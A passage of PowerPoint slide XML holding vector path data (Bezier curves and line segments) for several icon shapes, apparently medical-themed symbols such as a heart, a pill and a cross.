                  <a:pt x="12723" y="2524"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13572" y="1625"/>
                  <a:pt x="14916" y="1080"/>
                  <a:pt x="16088" y="1080"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18586" y="1080"/>
                  <a:pt x="20618" y="3315"/>
                  <a:pt x="20618" y="6063"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="6262"/>
                  <a:pt x="20598" y="6506"/>
                  <a:pt x="20588" y="6611"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="21600" y="6063"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="2715"/>
                  <a:pt x="19132" y="0"/>
                  <a:pt x="16088" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14607" y="0"/>
                  <a:pt x="12974" y="748"/>
                  <a:pt x="11983" y="1794"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11985" y="1802"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11900" y="1871"/>
                  <a:pt x="11839" y="1965"/>
                  <a:pt x="11809" y="2079"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11797" y="2076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10309" y="7560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12764" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10800" y="15660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11797" y="20098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11803" y="20097"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11853" y="20337"/>
                  <a:pt x="12039" y="20520"/>
                  <a:pt x="12273" y="20520"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12410" y="20520"/>
                  <a:pt x="12534" y="20457"/>
                  <a:pt x="12623" y="20357"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14361" y="19225"/>
                  <a:pt x="20995" y="12270"/>
                  <a:pt x="21558" y="6787"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21558" y="6791"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21559" y="6791"/>
                  <a:pt x="21600" y="6399"/>
                  <a:pt x="21600" y="6063"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="1019" y="7760"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1018" y="7754"/>
                  <a:pt x="1015" y="7720"/>
                  <a:pt x="1014" y="7715"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1013" y="7707"/>
                  <a:pt x="1013" y="7699"/>
                  <a:pt x="1012" y="7691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1002" y="7586"/>
                  <a:pt x="982" y="7342"/>
                  <a:pt x="982" y="7143"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="4395"/>
                  <a:pt x="3014" y="2160"/>
                  <a:pt x="5512" y="2160"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6634" y="2160"/>
                  <a:pt x="7908" y="2664"/>
                  <a:pt x="8760" y="3495"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7364" y="8640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9818" y="11880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7855" y="16740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8531" y="19752"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6242" y="17649"/>
                  <a:pt x="1459" y="12041"/>
                  <a:pt x="1019" y="7760"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="9803" y="20925"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8959" y="16740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11015" y="11711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8484" y="8505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9799" y="3457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9791" y="3454"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9804" y="3407"/>
                  <a:pt x="9818" y="3360"/>
                  <a:pt x="9818" y="3308"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="3130"/>
                  <a:pt x="9736" y="2981"/>
                  <a:pt x="9615" y="2882"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9617" y="2874"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8626" y="1827"/>
                  <a:pt x="6993" y="1080"/>
                  <a:pt x="5512" y="1080"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2468" y="1080"/>
                  <a:pt x="0" y="3795"/>
                  <a:pt x="0" y="7143"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="7479"/>
                  <a:pt x="41" y="7871"/>
                  <a:pt x="42" y="7871"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="42" y="7867"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="605" y="13350"/>
                  <a:pt x="7239" y="20305"/>
                  <a:pt x="8977" y="21437"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9066" y="21537"/>
                  <a:pt x="9190" y="21600"/>
                  <a:pt x="9327" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9599" y="21600"/>
                  <a:pt x="9818" y="21358"/>
                  <a:pt x="9818" y="21060"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="21013"/>
                  <a:pt x="9804" y="20971"/>
                  <a:pt x="9794" y="20927"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9794" y="20927"/>
                  <a:pt x="9803" y="20925"/>
                  <a:pt x="9803" y="2092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5" name="Shape 2765"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9971691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764"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11510" y="12764"/>
                  <a:pt x="11291" y="12984"/>
                  <a:pt x="11291" y="13255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11291" y="13526"/>
                  <a:pt x="11510" y="13745"/>
                  <a:pt x="11782" y="13745"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12053" y="13745"/>
                  <a:pt x="12273" y="13526"/>
                  <a:pt x="12273" y="13255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12273" y="12984"/>
                  <a:pt x="12053" y="12764"/>
                  <a:pt x="11782" y="12764"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="14727" y="10800"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="14999" y="10800"/>
                  <a:pt x="15218" y="10580"/>
                  <a:pt x="15218" y="10309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15218" y="10038"/>
                  <a:pt x="14999" y="9818"/>
                  <a:pt x="14727" y="9818"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14456" y="9818"/>
                  <a:pt x="14236" y="10038"/>
                  <a:pt x="14236" y="10309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14236" y="10580"/>
                  <a:pt x="14456" y="10800"/>
                  <a:pt x="14727" y="10800"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="19913" y="7150"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19959" y="7195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19468" y="7686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19468" y="7687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17606" y="9549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12052" y="3994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13913" y="2132"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13914" y="2132"/>
                  <a:pt x="13914" y="2132"/>
                  <a:pt x="13914" y="2132"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14405" y="1641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14450" y="1687"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15086" y="1244"/>
                  <a:pt x="15857" y="982"/>
                  <a:pt x="16691" y="982"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18860" y="982"/>
                  <a:pt x="20618" y="2740"/>
                  <a:pt x="20618" y="4909"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="5743"/>
                  <a:pt x="20356" y="6514"/>
                  <a:pt x="19913" y="7150"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10242" y="16912"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4689" y="11358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11358" y="4689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16911" y="10243"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16911" y="10243"/>
                  <a:pt x="10242" y="16912"/>
                  <a:pt x="10242" y="16912"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7686" y="19468"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6975" y="20179"/>
                  <a:pt x="5994" y="20618"/>
                  <a:pt x="4909" y="20618"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2740" y="20618"/>
                  <a:pt x="982" y="18860"/>
                  <a:pt x="982" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="15606"/>
                  <a:pt x="1421" y="14625"/>
                  <a:pt x="2132" y="13914"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3994" y="12052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9548" y="17606"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9548" y="17606"/>
                  <a:pt x="7686" y="19468"/>
                  <a:pt x="7686" y="19468"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="21600" y="4909"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="2198"/>
                  <a:pt x="19402" y="0"/>
                  <a:pt x="16691" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15586" y="0"/>
                  <a:pt x="14570" y="370"/>
                  <a:pt x="13749" y="986"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13710" y="947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13221" y="1437"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13220" y="1438"/>
                  <a:pt x="13220" y="1438"/>
                  <a:pt x="13219" y="1439"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1438" y="13220"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="549" y="14108"/>
                  <a:pt x="0" y="15336"/>
                  <a:pt x="0" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="19402"/>
                  <a:pt x="2198" y="21600"/>
                  <a:pt x="4909" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6265" y="21600"/>
                  <a:pt x="7492" y="21051"/>
                  <a:pt x="8380" y="20162"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20162" y="8381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20163" y="8380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20653" y="7890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20614" y="7851"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21230" y="7030"/>
                  <a:pt x="21600" y="6015"/>
                  <a:pt x="21600" y="4909"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10800" y="6873"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="7144"/>
                  <a:pt x="11020" y="7364"/>
                  <a:pt x="11291" y="7364"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11562" y="7364"/>
                  <a:pt x="11782" y="7144"/>
                  <a:pt x="11782" y="6873"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="6602"/>
                  <a:pt x="11562" y="6382"/>
                  <a:pt x="11291" y="6382"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11020" y="6382"/>
                  <a:pt x="10800" y="6602"/>
                  <a:pt x="10800" y="6873"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="13255" y="12273"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="13526" y="12273"/>
                  <a:pt x="13745" y="12053"/>
                  <a:pt x="13745" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="11511"/>
                  <a:pt x="13526" y="11291"/>
                  <a:pt x="13255" y="11291"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12983" y="11291"/>
                  <a:pt x="12764" y="11511"/>
                  <a:pt x="12764" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12764" y="12053"/>
                  <a:pt x="12983" y="12273"/>
                  <a:pt x="13255" y="12273"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="12273" y="9818"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12544" y="9818"/>
                  <a:pt x="12764" y="9599"/>
                  <a:pt x="12764" y="9327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12764" y="9056"/>
                  <a:pt x="12544" y="8836"/>
                  <a:pt x="12273" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12001" y="8836"/>
                  <a:pt x="11782" y="9056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moveTo>
                  <a:pt x="10800" y="10309"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10529" y="10309"/>
                  <a:pt x="10309" y="10529"/>
                  <a:pt x="10309" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10309" y="11071"/>
                  <a:pt x="10529" y="11291"/>
                  <a:pt x="10800" y="11291"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11071" y="11291"/>
                  <a:pt x="11291" y="11071"/>
                  <a:pt x="11291" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11291" y="10529"/>
                  <a:pt x="11071" y="10309"/>
                  <a:pt x="10800" y="10309"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10309" y="14236"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10038" y="14236"/>
                  <a:pt x="9818" y="14456"/>
                  <a:pt x="9818" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="14999"/>
                  <a:pt x="10038" y="15218"/>
                  <a:pt x="10309" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10580" y="15218"/>
                  <a:pt x="10800" y="14999"/>
                  <a:pt x="10800" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="14456"/>
                  <a:pt x="10580" y="14236"/>
                  <a:pt x="10309" y="14236"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="9818" y="8836"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10090" y="8836"/>
                  <a:pt x="10309" y="8617"/>
                  <a:pt x="10309" y="8345"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10309" y="8075"/>
                  <a:pt x="10090" y="7855"/>
                  <a:pt x="9818" y="7855"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9547" y="7855"/>
                  <a:pt x="9327" y="8075"/>
                  <a:pt x="9327" y="8345"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9327" y="8617"/>
                  <a:pt x="9547" y="8836"/>
                  <a:pt x="9818" y="8836"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="6873" y="10800"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6601" y="10800"/>
                  <a:pt x="6382" y="11020"/>
                  <a:pt x="6382" y="11291"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6382" y="11562"/>
                  <a:pt x="6601" y="11782"/>
                  <a:pt x="6873" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7144" y="11782"/>
                  <a:pt x="7364" y="11562"/>
                  <a:pt x="7364" y="11291"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7364" y="11020"/>
                  <a:pt x="7144" y="10800"/>
                  <a:pt x="6873" y="10800"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="8345" y="9327"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="8074" y="9327"/>
                  <a:pt x="7855" y="9547"/>
                  <a:pt x="7855" y="9818"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7855" y="10090"/>
                  <a:pt x="8074" y="10309"/>
                  <a:pt x="8345" y="10309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8617" y="10309"/>
                  <a:pt x="8836" y="10090"/>
                  <a:pt x="8836" y="9818"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="9547"/>
                  <a:pt x="8617" y="9327"/>
                  <a:pt x="8345" y="9327"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="9327" y="11782"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9056" y="11782"/>
                  <a:pt x="8836" y="12001"/>
                  <a:pt x="8836" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="12544"/>
                  <a:pt x="9056" y="12764"/>
                  <a:pt x="9327" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9599" y="12764"/>
                  <a:pt x="9818" y="12544"/>
                  <a:pt x="9818" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="12001"/>
                  <a:pt x="9599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6" name="Shape 2766"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10504952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7" name="Shape 2767"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11038213" y="448252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1782"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11782" y="11782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11782" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9818" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9818" y="11782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5891" y="11782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5891" y="9818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9818" y="9818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9818" y="5891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11782" y="5891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11782" y="9818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15709" y="9818"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="9818"/>
                  <a:pt x="15709" y="11782"/>
                  <a:pt x="15709" y="11782"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15709" y="8836"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12764" y="8836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12764" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12764" y="534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5349"/>
                  <a:pt x="8836" y="5891"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8836" y="8836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5891" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5349" y="8836"/>
                  <a:pt x="4909" y="9276"/>
                  <a:pt x="4909" y="9818"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4909" y="11782"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4909" y="12324"/>
                  <a:pt x="5349" y="12764"/>
                  <a:pt x="5891" y="12764"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8836" y="12764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8836" y="15709"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="1625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6251"/>
                  <a:pt x="12764" y="15709"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12764" y="12764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15709" y="12764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16251" y="12764"/>
                  <a:pt x="16691" y="12324"/>
                  <a:pt x="16691" y="11782"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16691" y="9818"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="9276"/>
                  <a:pt x="16251" y="8836"/>
                  <a:pt x="15709" y="8836"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10800" y="20618"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5377" y="20618"/>
                  <a:pt x="982" y="16222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2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8" name="Shape 2768"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238863" y="5104664"/>
            <a:ext cx="279328" cy="101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8900"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11291" y="18900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11291" y="2700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17673" y="2700"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19300" y="2700"/>
                  <a:pt x="20618" y="6328"/>
                  <a:pt x="20618" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="15273"/>
                  <a:pt x="19300" y="18900"/>
                  <a:pt x="17673" y="18900"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="6382" y="13500"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6111" y="13500"/>
                  <a:pt x="5891" y="12896"/>
                  <a:pt x="5891" y="12150"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5891" y="11404"/>
                  <a:pt x="6111" y="10800"/>
                  <a:pt x="6382" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6653" y="10800"/>
                  <a:pt x="6873" y="11404"/>
                  <a:pt x="6873" y="12150"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6873" y="12896"/>
                  <a:pt x="6653" y="13500"/>
                  <a:pt x="6382" y="13500"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="3927" y="10800"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3385" y="10800"/>
                  <a:pt x="2945" y="9592"/>
                  <a:pt x="2945" y="8100"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="6610"/>
                  <a:pt x="3385" y="5400"/>
                  <a:pt x="3927" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4469" y="5400"/>
                  <a:pt x="4909" y="6610"/>
                  <a:pt x="4909" y="8100"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4909" y="9592"/>
                  <a:pt x="4469" y="10800"/>
                  <a:pt x="3927" y="10800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4836"/>
                  <a:pt x="0" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="1676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6764"/>
                  <a:pt x="21600" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="4836"/>
                  <a:pt x="19842" y="0"/>
                  <a:pt x="17673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69" name="Shape 2769"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6810214" y="5015787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" y="8836"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1350" y="7752"/>
                  <a:pt x="2559" y="6873"/>
                  <a:pt x="4050" y="6873"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17550" y="6873"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19041" y="6873"/>
                  <a:pt x="20250" y="7752"/>
                  <a:pt x="20250" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20250" y="8836"/>
                  <a:pt x="1350" y="8836"/>
                  <a:pt x="1350" y="8836"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14850" y="12764"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14850" y="14727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12150" y="14727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12150" y="16691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9450" y="16691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9450" y="14727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6750" y="14727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6750" y="12764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9450" y="12764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9450" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12150" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12150" y="12764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12150" y="12764"/>
                  <a:pt x="14850" y="12764"/>
                  <a:pt x="14850" y="12764"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17550" y="20618"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4050" y="20618"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2559" y="20618"/>
                  <a:pt x="1350" y="19739"/>
                  <a:pt x="1350" y="18655"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20250" y="18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20250" y="19739"/>
                  <a:pt x="19041" y="20618"/>
                  <a:pt x="17550" y="20618"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="6750" y="2945"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14850" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14850" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6750" y="4909"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6750" y="4909"/>
                  <a:pt x="6750" y="2945"/>
                  <a:pt x="6750" y="2945"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6750" y="982"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14850" y="982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14850" y="1964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6750" y="1964"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6750" y="1964"/>
                  <a:pt x="6750" y="982"/>
                  <a:pt x="6750" y="982"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17550" y="5891"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16200" y="5891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16200" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16200" y="982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16200" y="440"/>
                  <a:pt x="15595" y="0"/>
                  <a:pt x="14850" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6750" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6005" y="0"/>
                  <a:pt x="5400" y="440"/>
                  <a:pt x="5400" y="982"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5400" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5400" y="5891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4050" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1813" y="5891"/>
                  <a:pt x="0" y="7210"/>
                  <a:pt x="0" y="8836"/>
                </a:cubicBezTo>
                <a:lnTo>
